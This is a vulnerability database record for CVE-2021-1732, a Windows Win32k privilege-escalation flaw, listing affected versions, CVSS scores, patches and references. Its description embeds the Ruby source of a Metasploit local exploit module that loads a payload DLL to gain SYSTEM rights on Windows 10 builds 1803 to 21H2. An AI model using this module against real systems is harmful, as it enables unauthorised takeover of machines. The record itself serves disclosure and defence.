ID

VAR-202102-0786


CVE

CVE-2021-1732


TITLE

Microsoft Win32k Security feature vulnerability

Trust: 0.6

sources: CNNVD: CNNVD-202102-670

DESCRIPTION

Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软(Microsoft)公司的一个用于Windows多用户管理的系统文件. Microsoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响:Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k' def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets. }, 'License' => MSF_LICENSE, 'Author' => [ # CVE-2021-1732 'BITTER APT', # exploit as used in the wild 'JinQuan', # detailed analysis 'MaDongZe', # detailed analysis 'TuXiaoYi', # detailed analysis 'LiHao', # detailed analysis # CVE-2022-21882 'L4ys', # github poc # both CVEs 'KaLendsi', # github pocs # Metasploit exploit 'Spencer McIntyre' # metasploit module ], 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] ], 'Payload' => { 'DisableNops' => true }, 'References' => [ # CVE-2021-1732 references [ 'CVE', '2021-1732' ], [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], # CVE-2022-21882 references [ 'CVE', '2022-21882' ], [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] ], 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_OS_RESTARTS, ], 'Reliability' => [ REPEATABLE_SESSION, ], 'SideEffects' => [] } } ) ) end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Windows Build Number = #{build_num}") unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) print_error('The exploit only supports Windows 10 versions 1803 - 21H2') return CheckCode::Safe end CheckCode::Appears end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), [encoded_payload.length].pack('I<') + encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end

Trust: 1.62

sources: NVD: CVE-2021-1732 // CNNVD: CNNVD-202102-670 // VULMON: CVE-2021-1732 // PACKETSTORM: 166169

AFFECTED PRODUCTS

vendor:microsoftmodel:windows 10 1909scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows 10 1809scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 2019scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows 10 1803scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 2004scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows 10 20h2scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 20h2scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows 10 2004scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 1909scope:eqversion: -

Trust: 1.0

sources: NVD: CVE-2021-1732

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2021-1732
value: HIGH

Trust: 1.0

secure@microsoft.com: CVE-2021-1732
value: HIGH

Trust: 1.0

CNNVD: CNNVD-202102-670
value: HIGH

Trust: 0.6

VULMON: CVE-2021-1732
value: MEDIUM

Trust: 0.1

NVD:
severity: MEDIUM
baseScore: 4.6
vectorString: AV:L/AC:L/AU:N/C:P/I:P/A:P
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 3.9
impactScore: 6.4
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

VULMON: CVE-2021-1732
severity: MEDIUM
baseScore: 4.6
vectorString: AV:L/AC:L/AU:N/C:P/I:P/A:P
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 3.9
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

NVD:
baseSeverity: HIGH
baseScore: 7.8
vectorString: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 5.9
version: 3.1

Trust: 2.0

sources: VULMON: CVE-2021-1732 // CNNVD: CNNVD-202102-670 // NVD: CVE-2021-1732 // NVD: CVE-2021-1732

PROBLEMTYPE DATA

problemtype:CWE-787

Trust: 1.0

sources: NVD: CVE-2021-1732

THREAT TYPE

local

Trust: 0.6

sources: CNNVD: CNNVD-202102-670

TYPE

security feature problem

Trust: 0.6

sources: CNNVD: CNNVD-202102-670

CONFIGURATIONS

sources: NVD: CVE-2021-1732

PATCH

title:Microsoft Windows Win32k Fixing measures for security feature vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=142782

Trust: 0.6

title:Windows Privilege Escalation Screenshots:url:https://github.com/exploitblizzard/windows-privilege-escalation-cve-2021-1732

Trust: 0.1

title:Windows Privilege Escalationurl:https://github.com/asepsaepdin/cve-2021-1732

Trust: 0.1

title:CVE-2021-1732url:https://github.com/beneficialcode/cve-2021-1732

Trust: 0.1

sources: VULMON: CVE-2021-1732 // CNNVD: CNNVD-202102-670

EXTERNAL IDS

db:NVDid:CVE-2021-1732

Trust: 1.8

db:PACKETSTORMid:166169

Trust: 1.7

db:PACKETSTORMid:161880

Trust: 1.6

db:PACKETSTORMid:162982

Trust: 0.6

db:CXSECURITYid:WLB-2021030124

Trust: 0.6

db:CNNVDid:CNNVD-202102-670

Trust: 0.6

db:VULMONid:CVE-2021-1732

Trust: 0.1

sources: VULMON: CVE-2021-1732 // PACKETSTORM: 166169 // CNNVD: CNNVD-202102-670 // NVD: CVE-2021-1732

REFERENCES

url:http://packetstormsecurity.com/files/161880/win32k-consolecontrol-offset-confusion.html

Trust: 2.2

url:http://packetstormsecurity.com/files/166169/win32k-consolecontrol-offset-confusion-privilege-escalation.html

Trust: 2.2

url:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2021-1732

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2021-1732

Trust: 0.7

url:https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021030124

Trust: 0.6

url:https://packetstormsecurity.com/files/162982/windows-win32k-elevation-of-privilege-vulnerability.html

Trust: 0.6

url:https://vigilance.fr/vulnerability/microsoft-windows-vulnerabilities-of-february-2021-34535

Trust: 0.6

url:https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e'

Trust: 0.1

url:https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732'

Trust: 0.1

url:https://www.fuzzysecurity.com/tutorials/expdev/22.html'

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://github.com/l4ys/cve-2022-21882'

Trust: 0.1

url:https://github.com/kalendsi/cve-2022-21882'

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://github.com/kalendsi/cve-2021-1732-exploit'

Trust: 0.1

url:https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html'

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-21882

Trust: 0.1

url:https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm'

Trust: 0.1

url:https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/'

Trust: 0.1

url:https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html'

Trust: 0.1

sources: PACKETSTORM: 166169 // CNNVD: CNNVD-202102-670 // NVD: CVE-2021-1732

CREDITS

Spencer McIntyre

Trust: 0.6

sources: CNNVD: CNNVD-202102-670

SOURCES

db:VULMONid:CVE-2021-1732
db:PACKETSTORMid:166169
db:CNNVDid:CNNVD-202102-670
db:NVDid:CVE-2021-1732

LAST UPDATE DATE

2024-07-26T22:57:29.884000+00:00


SOURCES UPDATE DATE

db:VULMONid:CVE-2021-1732date:2023-12-29T00:00:00
db:CNNVDid:CNNVD-202102-670date:2022-03-03T00:00:00
db:NVDid:CVE-2021-1732date:2024-07-25T17:53:12.640

SOURCES RELEASE DATE

db:VULMONid:CVE-2021-1732date:2021-02-25T00:00:00
db:PACKETSTORMid:166169date:2022-02-28T16:49:05
db:CNNVDid:CNNVD-202102-670date:2021-02-09T00:00:00
db:NVDid:CVE-2021-1732date:2021-02-25T23:15:13.930